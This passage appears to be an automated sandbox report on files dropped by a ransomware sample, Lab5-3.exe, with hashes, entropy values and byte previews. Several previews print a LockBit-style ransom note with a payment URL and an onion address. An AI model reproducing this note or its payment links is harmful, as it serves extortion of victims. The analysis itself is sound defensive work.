                                                                                                          Preview:....(.,..n:`._...&.X...>2.&Zf.L"....xxq#.o!....Z..x.0...]..S.83.Y.....d3Rw..2.N.....8C..&.B^....vh.s.t......gOY...H.......xi-o....z..{LSC%.s.G_."....#1....8.`Ix=l.\F.l....\.....&.0w...X...?z.(.U.o..D.@D...?..k......4\.....-..?@b}....MB.sy..rc.:)*$.?..J..../....mM.@...CU.......U.e......@D.K~-..Q.e.X4k.L-..l..::4n2....g]Sn ...E..Q..f.`(..Fp.4........Oc3X(.V....b.vQ.6...f.....4.....tT."[..;.XX....KR7..Bt..8..e.U7.x....6.....aL....nvR?xm....;S.....K.Q........#..G...F..Uw.g&.~}Y/.h.)-...1.....#W.eC@(H.O....kb.`#.......Y.......W.2C|e......x....-IK.j8|99V.1.j..L M...&.J.G.5%v-gm.d.v......[..~'5.......f......w.8. ..........R.11F.k.....b..v...... ....Q..z....+.}...%..^.vC..!)..7.3..(....d..u.YH..d...0.V.I..[.....7.>.[..\;..:y(gtz.q..61'o....U..M.2....B...&.....rk.Q.%..Z....]..0..!.?o........=...M.8D..x..QF..s.....gE.%..... ....@..A.h.......vk:)C...&...........U..Sar...HnT...W)...a....-.kA...a.Bq.H.A....(b+.hT.gh.Q...z.._#..5{2G64...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):323916
                                                                                                          Entropy (8bit):7.591401461185773
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:7rVMUs5np4VE0qXBo75SLLFWmiOj4wGRmWVtqwyvY4/6MuKKsKQtoeZ:aUsxYEXBotSL0miMctHu6MuKKsK7S
                                                                                                          MD5:08A6C6D9B8BB9353D9E08849C7C6FD15
                                                                                                          SHA1:AB1619032443A54A87D42927F658E45DFD9CBBEB
                                                                                                          SHA-256:33B4B23D49B828898944E1ED5F926C6984056C06EE9BCD62A11332D5FAF81D0E
                                                                                                          SHA-512:744B9BF1956E5B5DC84BFF8296DBBD65928F93BC595D4AABD6D1BBE7AE3ECA08DF99FB2B26DD033FDD741F84A67F2301CCBA7DB3A73356ECFBBC2AEAF1ED8347
                                                                                                          Malicious:false
                                                                                                          Preview:..q.)...o.....Ci...v..J0T....2C^}..fG..oM..,...?.......Q.).7.fu....N=....b*s..aW....0.fb...<.W..~qI.oQ..L.E....IB/.ph.o.....{..r.;*h..h!.*...@ (.......q$.uY.U..GV..M..U.F[_gJ['...%$..h.P.M3..... ..~.D.....mIe.;.D1,.._.0...>.2+...2Gw...mx......u`..a'.)...}...*.....2~+.(...B#..._.;..?...:......q.....g..p7Mj..v.......=....o!R.Z.....(.ru..q...q..c?^..2 .._...S..$..k.=...'.~CtA....z.C .$.....cv6.tb.{...e..7B..Bbqb..rL.t.....!..Z......k...m...4Jsy..v.pl_...v..J._..#t......&C....3...S.U@..5et4.c....2KB..J....k....1..:A.......Y\eqWj.u.>.00K...x2#..h.Hf..Q.....S.V.[..E...5./.P\k.E>x.2...!T....3..*...u%.6oM;.CQj..U.TH....2...gt&.....)....wy.J.zN.{..Zp..]38J....H..'....w....W.F.th...&x.~....U... .... A..[..ox...E.E..0..`G...=................|.*.Kx!...aG.S...4m.?...."...Bba...`Z....^B+.~..!...4%....s.(.....$....69#...G..#..."...8A.|....E.b.`.K.i0.?..z.AW.!Y.........Q..D.*IV....3.f58`....U.........3....R..9,p..e.........n.....Ov...c.........e@.0.+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):327648
                                                                                                          Entropy (8bit):7.589833275027882
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:+7mtAU1rMxcMOf9m5xBYx4igGfB8q1s7KhUPR+wl5/zEdzoVqOcmCrRj/B4ibOlr:gFUg+r9mjBompqUKhUPR+GlEUVAnrBJ6
                                                                                                          MD5:624F6DBFD26F18E5E05C95611D9CBC6C
                                                                                                          SHA1:805951D0B8422D02464BA6E1C998106DFF44A9C8
                                                                                                          SHA-256:8EF1F05C643C42CBD1E1452EDB98CF55537B3963F57134FD8A24E3C8D354154B
                                                                                                          SHA-512:1C59B5BCF9BEAE92D2C657FFB03F5401F86524A13DE1AB9056ED927D495A3B5D667914ABDE83915A7CAEFD60C6BB30642B1A50CABB067D425F1D3A8EB48228A8
                                                                                                          Malicious:false
                                                                                                          Preview:c.#.].]........w`.v..P....q..K...y..s...V.E+......a,.....!.e.,q........!....o#..].~.*V[ S..V.......a..?g.....&[.e.lt..4.:O.....Kf..m*-.0.j.K.).-o.h....*6. .Nh..t........p..HVCUB0..l...F.0...hxF..A0...C.......!.....b...rh'....................m.z..."..^.....ex...I..*!..Xz.....eZ.C.[T.e....<.F....D....</<.Z;H*@#S..IC...S[......q.7."....d.. +PY..0...N.j..=.~....-./..G.$c.m..&J..f.y...U..m"..W..Z...F.T2.B$V*...^.I...{.o...k......|...sm..L...^... U.Y.L......3.$.7......f....ri.f.d...f?.ReZ}..l.5..x....t/ZhV.9.Z .D......8.:...{....^r.l~.4.....-..*.a..........V........3...J..._..0.......5.%.;;....3v.5.h..|.p.q......-A'.....i..e.B.....t.J...h)S.C...;..3.(4........V.~..w.`.j..4>..2.......}30.X.%. ...+".?..%ty..^......|..(...8.../y......~I..s...*.........G.p-..:.P.;....A3FO$...hnU..n.n,.-.....b6KF..a...i.....O.4..[......g..,6.".L.t.....^ .4.........$].+xf.......8L..c...T3.~.3..?....}.`^...@.#.[.~%T3S..ps.(...s..{(...JW)v<s}.L.....7.t...VP
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):145920
                                                                                                          Entropy (8bit):7.998781790155431
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:4JU3sTfFMBCA/XfOK/R7RNiA4s9iuK2CA0Xhpk6HWrzKEd4dF+SIykUd4NRbPVZ:4JksTfFUvPt577SskMsXfkprzeESIyXO
                                                                                                          MD5:25E5ACA897A63641C993E3AF0A41ABD8
                                                                                                          SHA1:09D7FB2C5137F274F0C94A1CD7AD734E25634B4D
                                                                                                          SHA-256:6AA2D0FA3F1F4E6700C41CAF3AA8932921A8D82493ABBD6C68C6D1011AFDFD1C
                                                                                                          SHA-512:D75AB10395F5D0EF05E25A4F29D1308C300765B34FF8A589E254D3A6730F12FE283860B537947B119BA9DA083401DDAA4B4B456CBDECD8B608723F901D220DBF
                                                                                                          Malicious:true
                                                                                                          Preview:..9...Jd(......A....h...1....L..6..uUV..q.Q..l.%....%...,@.!./QT.A>...*JD....\|I.c...m<.B6.Q?lhv..J..-:.d..bs.C....0...R..9-/"...y.#Bc..Z..ft...D;..A.-....p.=.Y.<V..^y...H..y..Y2Y.T.....5.u..*.0c3.3M..c...$...~..x...S..^d..`.%....;....\~.$..\.P.._.......H.8.Q1...g.l..Q.L-.6...&3d....B.>..^....E^.KJ#....,c...by...B..fD.?.)?....q..=.....$....7f..\,..i`.sC..k.:..z.6i'+...0....8K tL.f..6L.._..6.J/H..\...N....Re...0...~q.4.>.e.........bz...{.........2).l>. . %.].k@.8....+jj.>/.....O.*..-...e........-H..~...W.../w..9.B]X..,..G..`..h.L.$!d....9.2...s..i.L6...M.{G../.mK...nb.P.Bbl...&.z......R........vv..Yy~..<...<<.$Im.......}..V....Y..1....ZX....z*s....|.3,I.r....=....O...l`"..H..<...........i.......)!.sw.....;f.......L.f.;....N..f.f..Q...... .?."...+...C..........'Z...V...J-.4A)=T8...f...].aT.G.`.g.}n.....V.A..*m.e.Hy.....i1.eZj..&A.h._.Q.a........$.KG'X.!F.....A.T."..._..D/A2....w......>....sTx..I...LG'.N.....u............g......h..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):146720
                                                                                                          Entropy (8bit):7.998662477359105
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:1G9BdUSJJiGNLyydgmaJcnur1INF2THN3Z:1G9B+SJJite8cuSSTxZ
                                                                                                          MD5:B26BB7185784A9870BEEE2326A25820C
                                                                                                          SHA1:E61D6B4AC267A60C0A00964A195A3B2497AC791E
                                                                                                          SHA-256:B48156431FED60A8724EA3577B2EF9CC53824D283FB0CEB5B547B452D3B8C87E
                                                                                                          SHA-512:09F02300F44D0E0545B608C3AEA05611EF162C73B291CA19B45D5891B779411C85B617E451385C2ED017EB3785E821F415AE021F3099E6A65C74E30543329A82
                                                                                                          Malicious:true
                                                                                                          Preview:[bZ.AS.|%..........Y..P.a.jr..:.o..o(.............s.~~....8..X`.)#.s...Suz.....b.k))3.}.R".&`BM.............F..h...*+...{AF`......L.e..`t.4.z<%</u.....G.j{2...%.q.{..]%.....Q.D^.i#..D..0.gT..F!.g......S......$.D..-..e.]~.DM......u%.~..I.".#4...3f......D...'..<r.|M.IT487.....-..k..RU.M.g....^~...S.g.h..)....%.um.hT...)....]+.=O.1LuL.2..m....'8........o.,b....M.B.!.1..c3.....7f..\.P[dG.P...yZ............QC....Z./....L.xHK...&:.x..E.8=.BS.}.x.W..mO.>....9../]..TY.;of+..6.K...^hP.P..k7`..8.E..1..pYU..`..IT.:...+.F")}...i......2t...SK.n.d..#..3..l........[Wl...F7.<...G.I..|.....yR6r.CL..N.D.....#I.@_..;.7U<F..T...........r<.cU..5T+F..c..f...../...g.t^....(.S....."4B...\i%.7..g1....e......hCM.C.a...n.HH....i8x...... -r.!.C.h..5..(o..jXtY_....j^29..((|...="TT.L#%~.^\PJ...... C.....^..O..D..E.j.<.$........G%?...FFx...1i... W.J.Y.!..m.........}B..r..o.I.......8.y....I....a.^....j.4.$...2fT?.t.G..:}.....9...."&(..-....[...W......M...(.........|:.._,).8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:Novell LANalyzer capture file
                                                                                                          Category:dropped
                                                                                                          Size (bytes):147040
                                                                                                          Entropy (8bit):7.998937114661112
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:X9C7Z/7tN/3ip9B0EmmUm7KAKYrO2aYtAXjD9qAbSCnuEkZ:X9C7Z/xNfip/D7KvYKbYtATZBbSCnvkZ
                                                                                                          MD5:1F519CD1721F1DEF15B4DF19476661F3
                                                                                                          SHA1:813AAF4829679B9FA200401A05F539E5511D4F47
                                                                                                          SHA-256:88B4A82B1FAFF1AB3C56A740A70FC07C50CBCD4DBFBE685054C8DBC1DF2A867F
                                                                                                          SHA-512:168AE6BD0AF079F7A308FA73A6A01E5F818837784CBD9B1511C64332CC61B25DC276EA75BADD1368AE23E5EEECB23319F6C1BE22B0FC43269BF385F459A8A373
                                                                                                          Malicious:true
                                                                                                          Preview:..K...H...2._...Sx.<.{[.......... ..yv.....=A\.....LJ.;...6..l.....e.\]2.Oe........4........uV..d$.....0`.p:.....\n*..a...A..9."h|....\...g..^.N..c.sw.p.\..7..W..d?\".n......N..:..U..G..-...p.4O...tS.g...:.k.P.oQN..sDT.../...B.......KoYzJ..8n..bxp.6%5cnH.;!..Z4#Wr...1....c...!...-.(K.6.''(.X...#..$..U..4.....i..........R..i.f.-.1 z..!..,+...o...`.j'..OYZlFaL[.^.1fx.....s...7.....x.\....."$R$<."....v.]<.5.."../&.-C....... F9.......B/.l!%.S*..Dy.].4....d...KO.#.N........H..^yt.a/...=!......l1.B.(P...._..5.Q...i..2...~.p0r.......A.N....&#...J.vc". l..o...|..7.eX.9kG..V...O...C...XS..e..e.:...k.a../.Y....Sn...P=\.(.].W..c.2.5..).;.!...ivD7t.d..".y&.e,A.p.W[...Y]...8~ ...6`.Z..<{e...n....c.!..0..D.EQL..=.!....W............./i...t..i.....'p....o..X..65.........G\U[.......z.....mT.....J...sA\(Ww(.\..#.o...:..=v.4...x..g....'....V.F2@.Q..Z<..,W.A([Fr...^..@..q....2.G.'..H}I....=2"x.L1.9..0&pV..@..93z......g.5.....XL..me...l.q.@.....|..x.!$_,...F.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3052062
                                                                                                          Entropy (8bit):6.461949449864071
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:QkcnaxpDGsSetbrylMQmV8cqY0KRJiS3PhSA+1TD63gD/JQ+jaYry4M6taGxCPGk:QkcQnXhZ0Kj0iKryeNFxTuQduOoB7
                                                                                                          MD5:EC300FCC596E01B68DDE45A880E022BD
                                                                                                          SHA1:56AD159E4ABF574321E53B31432FDB5F8B9C4326
                                                                                                          SHA-256:12EF7EC08B43455CBB4F103260E16350F5194E01811D8A3CF3B931288E99545C
                                                                                                          SHA-512:E30951D6D82BB320C262FA42DE40873427F5B31C0DFE50D4A87963FD5CE8187A4E700D4604CED30B1BA2C8C4277D07F8480FBDA88526E6322E6B4D787E52C2F1
                                                                                                          Malicious:false
                                                                                                          Preview:.].D.ap.,..O...0H...O..hI.p!...S....K.Y&....6.M?.d..Zk.s...N...-.c8. ./n.t.d{.y.[wpZ.@:...C\.W...E......)7...@...m.m.J...$1..Ma.)..A,.. .$.f{4*D.2.?.Z.,...(.x.jml.......\"R..1./p......(...<L...XM-k..@....`~k...6a.U.\zsyW........8...5m...6.._.5.u.....1..e+|.6....N..s.Q!YD.1va..(..Y]...".C.'.I...]9..D..STc.......?....h...uP.h.._.Nk.K..xlCk<..b.8a....Ob...../..n...G.....x....x@...-..S.8u.3...[..$1.......3.1.V..t`w..,.......Oq.t.....h7..iu{ .^v.{.s.%a.1;.!..[.`.......2..E.u*...o..Kd..L`U..a....D.nz...fK..G.:......>....+nVV.{........mT..qQ.i.]..v...:m@....@...y..P./..|.|..h..p....&;......t.........;..-.du.W...n.y.4...86..t"...%.....8Cb..rQvm.....A...}`y.](KB......m.....Op.3Sgf."f....9......^@aA.q.d.)F=..,.....wK..{{.4rk.,....>J.B....+).,+.l..X#..R...z..h..?...#.....:.....-....(.G.3..^q..o..5la.H@.[N!.~R.e..X/g...oF5.<.Y....Bh..8*=O./.X,.%$......'.+.|@.I.;. .V.r.....E...,.0..4'.<r[l:..\<..d.0.\...m..7..vW.{uJ.1........,..K...ll-.gN;[$....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):792552
                                                                                                          Entropy (8bit):6.884113190080424
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:GwdMULGxOXnHhXQP75tBfy7PSptTt+t8qAtcoZyLeqj1aAHwOJPz:VdMUfHdg5tcjStTY6tBGHBfQ8Pz
                                                                                                          MD5:B3CE34A1AA7E84CFAAFCEA19AF4F54F0
                                                                                                          SHA1:F291A059302D30EB66E277316F24B0E05D9D91D2
                                                                                                          SHA-256:28D6C47C490E0479A3BAB2BF76ACD07C31A031BBED11886F95681DFE4C5F09F3
                                                                                                          SHA-512:E24DDB417817978ADFE2BEA6A851CB97ECA72A6527A8E66F12F6D97A7FF6E8BE15DCDB95D9A4A3219A00460BBF3ADEF8E96F89ED7DA8B1CD64CA0283D30C307C
                                                                                                          Malicious:false
                                                                                                          Preview:...r'g........G.<.w...4..(y.W.!..c6...I.../.+..{H....\&#.?.$.......e..GG.x.X.N..f%.....,k...Q.....`.I^....v<...q.-.....!4I...q....Dc....*....N..b.-.`.......c..x1Y.O..Z.P.....|zpa....m.D. ..J....`....h.....\............:.=...#x...b...8....p.B.U7j..=.D...r..uv..Z.W..TZ...a..j.[..`[B..~..d.t..jG...W......A.F.n.F>:......X...P..u.L.|....,.)..y.r-e.......d..B*...Cm.k...;. .a.y..d..)..}a..@^..0.k.....[4...KdOHu...x*m9}..l..... L...f...-t...]...H..1.G.`..........Uf.....a......?...R...lwP.QB.......a.$...X-<.........E..A.1.S.x..>.g...6T}...A.......w..1..C........V.N.ao.|..1Z......R.K%....,.?p./?......;+#"...T|.....A.^...."....C:N.m.....P|75..2t/Q..X.........$q.B.kvg^.D.j..:..|....CU...Y..~.B<h.*.r.8..\o.3X.........q@cMW.=..7..G.k..}.....gC.+....EaG..x8.lU.*-%(....1l..!...] o...ea.t...`f.........U...pPV<+..B%p../.V.4..Vd..vL.0bg../#|B:..*c)1..zw/J.......}..M_..Q...hY.#Y../...9..HP..L...6PkfY..$d..o..qF..b.'_..g6Y.H...t.(X....+;K>..\xG.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):457704
                                                                                                          Entropy (8bit):7.472699003352479
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:rFUnot4mAc+MrN1DZlYTr/b3BOCdVczxcZGBT:hao3qMZ1DZlYTDjBRczxcG
                                                                                                          MD5:2730051C631D10ADB3BE7644B6DA08C2
                                                                                                          SHA1:6F0EAC1C8F6A3D0B9A947270B7E6523802E66247
                                                                                                          SHA-256:51724C543B2CAB52D9323D743AFFC915C22D81CC22B6243BF91F81A81E23DBB0
                                                                                                          SHA-512:A5C283F6713B110C6DAE13FA26E413DACC79AF0B4740E5262AAFBB85A60FB0E65934705E4E13512CBA6E65F423208F45A57CD3086130C18FD69926285A71F931
                                                                                                          Malicious:false
                                                                                                          Preview:..:g. {..>...mo$D..k...t...v......<...A..w..]FJ.7....a.P.f.Y..CK>....g L.R..-....|.Rg.*.^....d.5.HU.r*.}..-..?...:...HO..s%.)9.Y.-.Z`....6n...LrEi4)...N7Sn.< .Bo.ux~.1.cfN..X...|<!.........}.*o.....'...$..p...NA |.g. M...n.<..4P]<.upG..Ml&.....o...r{I......j=Q.Q7\S../."5.......|R..^.B...M..L|...<........[>B.C..Q.L;..'..../.c......c.....?..k.CB..../..L.C.Y..hj.WJ.I.Lk^/..^C...r*...5-.(....:.....Cc...~3Wv.."....w...M...E.b..`.e...ws..(..nF..e......HwW7...7..[~z..I..U...M\.....0Op,....7kj.......e+]b.)..m/.x..7ee=....Y>...-...q1......7.H.Lj....eT.K.t..t.q~:....r...T.Q.1..........I.e..'^..f1.....5..n..I>....Y~.Z..j..0k8r......LbY..I-.P$...e."...M......f.y\.[#....,.|e(<5d.u..&..t8..<zS......A....b.v.......C.eQ~..@.G../...l*... ..*.,...+Y.>b]....^.\.#.......P..J....#....NR+.6....NTy..I..........3l.H4T.M.]...1...#...\....ND..V.......t....W&j.7.M.....(.......@U.._~.').........g...+.fF.c..F...k.<d<S....a..j0Y..!.\T.H.<]a.=..C.."..........5d
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):193008
                                                                                                          Entropy (8bit):7.998968356419507
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:E97cZAfZeJKvDGkHbSehMkbh1fOdZp/6pFyPtSQR25DIthG+lQLi2X8XZ:EOixeJKvDGkHbnhMkbh1Gd/ypgFSQRiM
                                                                                                          MD5:96C7CCC864739D6BF222D248537D2F06
                                                                                                          SHA1:228D0CBD194F466BD3E50D526E8CBFAA96BA2250
                                                                                                          SHA-256:A72451DB2340D45489B560475614B101A6329532E4214EB40FBCBE168EA961D8
                                                                                                          SHA-512:D5689DD9CA62F04C7605C9091A10CB499E2727DF65AE255D805077F690641413B593F938700472B420AA1377865BAE0CB74B7F63B6F0C0DABD47BEAE3FA61CA3
                                                                                                          Malicious:true
                                                                                                          Preview:`...H.....-p..=.....Co).wiZ.0..C.j_Y#......'..J$K..K.....=s.#..jD.MA?..*.........=.0..]..4..........7.....PG..M..=a.'....{.4e/.04###.._<I....e....T.]..H.?....8p4..............-.X.6&........ 5.:)`6.n.....u..+..Mg..U.F..f..~.G.>.. ..y.Q.J..o).'...../.jJ^.x/.u....H.A...h".I...Y,~.5...}...8P.4...9P.#.Z...EJ...:.}t.......k...e.GfCq...0.:.P.....j.5!/BH...W2Q.....(.S.B...u. C..,..b.q:..."...@.>.P.$.(4...g..C{.8..sD\..+..#.`sU...6....ns..9^.,&..)...!..uZ'..p...&..p..gTO.....,)%..:....a..q|.o...F2.f..k>I..1...r.....&3.'('a...l.9%....).|..j..X).F.t..M....<.nA(.....@7.}...No.......\..F......./......Q;=.;....T|4#b\...n81.].B......1v..23c.O..#$..l.42..@..S...B.aL..,A.H.)....Nz'B;...E.Bgr..,..geD..L.......}...].....C..H.5+.f.....<...&. .e......!Z.Ly......7l;.0..Eo.fn.o..1..y..........Oe.9.Bk..|.lO8p...r....I..@..#.=@.\r....o..Q..15..ue.C..wW.K.Z....g..rss.'a..w.B.j..Z....>.r...]#.w......|..x.}....t......u[.?7.N.N..V......4..<c[.}...E../.K..x......B.%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2894312
                                                                                                          Entropy (8bit):6.752060783278584
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:UaB2d6cuwBwC4mzUv4a8IJcdiz4w1ZZTMbI4s/06iU+dGugfLotZt1:UacDRezTMb0/5fLo/
                                                                                                          MD5:84C18713BADD05394C9182FE6BADB58F
                                                                                                          SHA1:D2540F807AD1E58A90C4C71A5D492E6757FEAA66
                                                                                                          SHA-256:42D74AA3FEAE94B84E85A5CC826653B0455161BD2F185530CBA25660AFA8B34A
                                                                                                          SHA-512:D67DB1AF8123788B61A8395BF4A26DB41A6DD6F4F66F2A7B5611CFB12B7853E35D1F078A6DF486D31E1A191F99035014DF2E108606531F18AC8433E14140072F
                                                                                                          Malicious:false
                                                                                                          Preview:..I`G),N.L.2....3...~...{.Z......DFr..s....U].!..o.(..(!$z..n.r.y...8..b..s....7..wlL.kCN...k.Z.....@..<.7...4Q...U_...AOn.0D.......#b.......xYi.....G.i.{_P.+y...l/U........0...0........B..U.'t..Sw.7!].}.6h...i..O.u..g.....J.vo..Xi..].p$&'...a.!=./..u..]=.ug....M2...........fxjD..%...!..U&.H.H......57.Ki.-`.......(.......U...R^.p....m...7.e@F........)......Uz..8k-..{....A......0.....v.....9...v...{.n..>..........95F.4.|..%.I...+..K..I.E........qG. K.i...r..)..`..&.b......Vj*9.@..) .d.....0....k...=^.....n..P..'.rM...4.g...oB.I.. ..|....j...TP....~l...M....H...%m@...|@...Do'.Q....V......b..[.x '..b.4.M...(ip.....@.....6......XMo......`...Zl.._.@."...1cY.>.}x64..,...\0..of5..(rC..6....5C_.ZF.....%..E....cl..a5.e.... ....O..z;h...:..5u.q......se....S..E.....1..S(.?....U3..[.w.=)......e...AiJ.*...|<..8w%v.>.k...q~H.!..5l.bK.0(..hI..o+....T6..........l'..8E.T/+...S.....Q-.Qd%......f[F....H...dFU|.7.f.+/...a\.+......~...b>m.f.c5..tY.s.....q.9#>.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
